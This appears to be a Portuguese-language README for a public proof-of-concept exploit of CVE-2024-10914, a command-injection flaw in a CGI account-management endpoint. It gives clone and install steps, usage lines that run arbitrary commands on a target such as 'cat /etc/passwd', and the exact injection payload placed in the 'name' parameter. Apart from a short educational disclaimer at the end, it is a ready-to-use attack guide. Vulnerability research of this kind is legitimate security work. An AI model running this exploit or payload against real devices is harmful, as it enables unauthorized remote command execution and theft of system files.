
PoC para explorar o CVE-2024-10914
Exploit para vulnerabilidade de injeção de comando no endpoint /cgi-bin/account_mgr.cgi. Esta vulnerabilidade permite executar comandos arbitrários no sistema afetado através de parâmetros não sanitizados.
CVE-2024-10914 é uma vulnerabilidade de injeção de comandos que afeta dispositivos com interface web CGI. A aplicação vulnerável não valida corretamente o parâmetro name na solicitação cgi_user_add, permitindo que um atacante injete comandos do sistema que serão executados com privilégios da aplicação.
Clone o repositório e instale as dependências:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
Ou instale manualmente:
pip install requests
O script fornece dois argumentos:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>
-u, --url (obrigatório): URL do alvo (exemplo: http://192.168.1.1)-c, --command (opcional): Comando a executar (padrão: id)Executar comando id:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
Executar comando personalizado:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
Listar arquivos:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
O exploit envia uma solicitação GET ao endpoint vulnerável com o seguinte payload:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "
A string vazia é fechada com aspas e o comando desejado é injetado, que é executado no contexto do servidor.
O script mostrará:
Este código é fornecido apenas para fins educacionais e de pesquisa de segurança. Deve ser utilizado apenas em sistemas sobre os quais você tenha autorização explícita. O uso não autorizado deste exploit pode violar leis locais e constituir crime. O autor não se responsabiliza pelo uso indevido desta ferramenta.
SS3K
Não especificada